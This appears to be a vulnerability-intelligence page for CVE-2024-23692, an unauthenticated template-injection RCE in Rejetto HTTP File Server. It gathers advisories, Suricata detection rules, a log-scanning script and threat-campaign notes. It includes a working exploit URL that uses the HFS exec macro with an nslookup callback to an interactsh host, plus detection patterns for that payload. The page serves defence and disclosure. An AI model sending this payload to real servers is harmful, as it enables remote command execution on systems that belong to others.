CVE-2024-23692
published 2024-05-31
Priority: P199 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Ransomware, Initial access
CISA Known Exploited Vulnerability, due 2024-07-30
Exploited in the wild
EPSS: 99.48% (99.9th percentile)
Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rejetto | http_file_server | <= 2.4 | — |
Detection & IOCs
url: {{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
other: shodan:product:"HttpFileServer httpd"
- Exploit requests use HTTP GET with template injection payload in query parameters; look for URL-encoded newlines (%0A) and HFS macro syntax (e.g., {.exec|...}) in the query string targeting the HFS root path.
- HATVIBE C2 communication uses HTTP PUT requests; monitor for anomalous PUT traffic from hosts running HFS to the listed C2 IPs/domains.
- Detect HATVIBE persistence via scheduled tasks spawning mshta.exe; alert on scheduled task creation invoking mshta.exe on Windows hosts.
- Nuclei template matcher checks HTTP response body for the string 'rejetto' as a confirmation of successful exploitation; use this as a detection signal in HTTP response inspection.
- Insikt Group provides Snort and YARA rules for HATVIBE and CHERRYSPY; deploy these rules in IDS/IPS for network and host-based detection of TAG-110 tooling delivered via CVE-2024-23692 exploitation.
- The Nuclei template uses an out-of-band DNS interaction (interactsh) as the primary matcher; the exploit payload requires a live interactsh callback to confirm RCE and will not fire in air-gapped or DNS-blocked environments.
- The exploit sets a 15-second execution timeout for the injected command; detections relying on response timing or content may miss executions that exceed this window.
- The C2 IPs and domains listed are associated with TAG-110's broader HATVIBE/CHERRYSPY campaign and are not exclusively tied to CVE-2024-23692 exploitation; they should be used as campaign-level indicators rather than exploit-specific ones.
- Rejetto HFS 2.3m is no longer supported; no patch exists for the 2.x branch. The only remediation is migration to HFS version 3.
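The query-string checks from the list above, applied to web access logs; this is an added example, not code from any of the sources quoted on this page. It URL-decodes each request's query string (repeatedly, so nested encoding is normalized) and flags encoded newlines, HFS macro syntax and the `exec` macro. The log format, indicator names and sample lines are assumptions constructed for the illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MACRO_RE = re.compile(r"\{\.[^{}]*?\.\}")        # HFS macro syntax: {.name|arg.}
EXEC_RE = re.compile(r"\{\.\s*exec\s*\|", re.I)  # the exec macro named above

def decode_fully(value, max_rounds=3):
    """URL-decode until stable so nested encoding cannot hide a macro."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the sorted indicator names found in one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    query = decode_fully(parts.query)
    hits = set()
    if "\n" in query:                 # %0A in the query string
        hits.add("encoded-newline")
    if MACRO_RE.search(query):
        hits.add("hfs-macro")
    if EXEC_RE.search(query):
        hits.add("exec-macro")
    if parts.path == "/" and "cmd=" in query and "search=" in query:
        hits.add("cmd+search-params")
    return sorted(hits)

def scan(lines):
    """Return (line_number, indicators) for every line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := classify(line))]

# Constructed sample lines, not captured traffic; the cmd value is a placeholder.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jul/2024:10:00:00 +0000] "GET /?search=report HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jul/2024:10:00:05 +0000] "GET /?n=%0A&cmd=PLACEHOLDER'
    '&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.} HTTP/1.1" 200 900',
    '198.51.100.7 - - [10/Jul/2024:10:00:09 +0000] '
    '"GET /?search=%2525x%257D%257B.exec%257Cx.%257D HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

A hit on `hfs-macro` alone is worth triage on any host running HFS 2.x, since ordinary search requests carry no macro delimiters.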
CVSS provenance
- nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- vulncheck · 9.8 CRITICAL
- cisa · 9.8 CRITICAL
GHSA
GHSA-cw5c-xm7f-wx63: Rejetto HTTP File Server, up to and including version 2
ghsa_unreviewed·2024-05-31
CVE-2024-23692 [CRITICAL] CWE-1336 GHSA-cw5c-xm7f-wx63: Rejetto HTTP File Server, up to and including version 2
Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.
VulnCheck
Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-23692 [CRITICAL] CWE-1336 Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Rejetto HTTP File Server contains an improper neutralization of special elements used in a template engine vulnerability. This allows a remote, unauthenticated attacker to execute commands on the affected system by sending a specially crafted HTTP request.
Affected: Rejetto HTTP File Server
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://asec.ahnlab.com/ko/67509/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cert.gov.ua/article/6280129; https://www.f5.com/labs/articles/threat-intelligen
CISA
Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
cisa·2024-07-09·CVSS 9.8
CVE-2024-23692 [CRITICAL] CWE-1336 Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Vulnerability: Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Affected: Rejetto HTTP File Server
Rejetto HTTP File Server contains an improper neutralization of special elements used in a template engine vulnerability. This allows a remote, unauthenticated attacker to execute commands on the affected system by sending a specially crafted HTTP request.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: The patched Rejetto HTTP File Server (HFS) is version 3: https://github.com/rejetto/hfs?tab=readme-ov-file#installation, https://www.rejetto.com/hfs/ ; https://nvd.nist.gov/vuln/detail/CVE-2024-23692
Remediation Due Date: 2024-07-30
Suricata
ET WEB_SPECIFIC_APPS Rejetto HTTP File Server Template Injection (CVE-2024-23692)
suricata·2024-10-23·CVSS 9.8
CVE-2024-23692 [CRITICAL] ET WEB_SPECIFIC_APPS Rejetto HTTP File Server Template Injection (CVE-2024-23692)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Rejetto HTTP File Server Template Injection (CVE-2024-23692)"; flow:established,to_server; pcre:"/^(?:GET|POST)$/M"; http.uri; content:"/?"; content:"cmd|3d|"; fast_pattern; content:"search|3d|"; pcre:"/^[^\x26]*?(?:\x7b|\x24|\x23|\x7e|\x40|\x2a|\x25|\x5f|\x3c|T)(?:\x7b\x3d?|\x28|\x5b|\x25|\x23|\x28\x3d?|\x2e)/R"; reference:url,mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/; reference:cve,2024-23692; classtype:web-application-attack; sid:2056776; rev:1; metadata:affected_product Rejetto, attack_target Server, tls_state TLSDecrypt, created_at 2024_10_23, cve CVE_2024_23692, deployment Perimeter, deployment Internal, deplo
Suricata
ET EXPLOIT Rejetto HTTP File Server Unauthenticated RCE Attempt (CVE-2024-23692)
suricata·2024-07-10·CVSS 9.8
CVE-2024-23692 [CRITICAL] ET EXPLOIT Rejetto HTTP File Server Unauthenticated RCE Attempt (CVE-2024-23692)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Rejetto HTTP File Server Unauthenticated RCE Attempt (CVE-2024-23692)"; flow:established,to_server; http.method; content:"GET"; http.uri.raw; content:"/?search=%"; fast_pattern; content:"|7d 7b 2e|"; reference:cve,2024-23692; reference:url,github.com/jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS/blob/master/exploit.py; classtype:attempted-admin; sid:2054424; rev:1; metadata:attack_target Server, created_at 2024_07_10, cve CVE_2024_23692, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_07_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_tec
Exploit-DB
Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
exploitdb·2025-03-28·CVSS 9.8
CVE-2024-23692 [CRITICAL] Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
```python
# Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
# Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-23692
# Vendor Homepage: http://rejetto.com/hfs/
# Software Link: http://rejetto.com/hfs/
# Version: 2.3m
# Tested on: Windows 10
# CVE: CVE-2024-23692
import requests
import random
import argparse
from colorama import Fore, Style

green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
```
Nuclei
Rejetto HTTP File Server - Template injection
nuclei·CVSS 9.8
CVE-2024-23692 [CRITICAL] Rejetto HTTP File Server - Template injection
This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.
Template:
```yaml
id: CVE-2024-23692
info:
  name: Rejetto HTTP File Server - Template injection
  author: johnk3r
  severity: critical
  description: |
    This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.
  impact: |
    Unauthenticated attackers can execute arbitrary commands on the Rejetto HTTP File Server through template injection, potentially compromising the entire system.
  remediation: |
    Update Rejetto HTTP File Server to a version newer than 2.3m.
  reference:
    - https://github.com/rapid7/metasplo
```
Metasploit
Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
metasploit
The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges of the user account running the HFS.exe server process. This exploit has been tested to work against version 2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers and no patch is available. Users are recommended to upgrade to newer supported versions.
Greynoiseio
NoiseLetter June 2024
blogs_greynoiseio
Recorded Future
Russia-Aligned TAG-110 Targets Asia and Europe with HATVIBE and CHERRYSPY
blogs_recorded_future
Summary
Insikt Group has identified an ongoing cyber-espionage campaign conducted by TAG-110, a Russia-aligned threat group targeting organizations in Central Asia, East Asia, and Europe. Using custom malware tools HATVIBE and CHERRYSPY, TAG-110 primarily attacks government entities, human rights groups, and educational institutions. The campaign’s tactics align with the historical activities of UAC-0063, attributed to Russian APT group BlueDelta (APT28). HATVIBE functions as a loader to deploy CHERRYSPY, a Python backdoor used for data exfiltration and espionage. Initial access is often achieved through phishing emails or exploiting vulnerable web-facing services like Rejetto HTTP File Server.
TAG-110’s efforts
- https://github.com/rapid7/metasploit-framework/pull/19240
- https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/
- https://vulncheck.com/advisories/rejetto-unauth-rce
- https://www.vicarius.io/vsociety/posts/cve-2024-23692-detect-rejetto-hfs-vulnerability
- https://www.vicarius.io/vsociety/posts/cve-2024-23692-rejetto-hfs-mitigate-vulnerability
- https://www.vicarius.io/vsociety/posts/unauthenticated-rce-flaw-in-rejetto-http-file-server-cve-2024-23692
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23692
2024-05-31: Published
2024-07-09: Added to CISA KEV
Exploited in the wild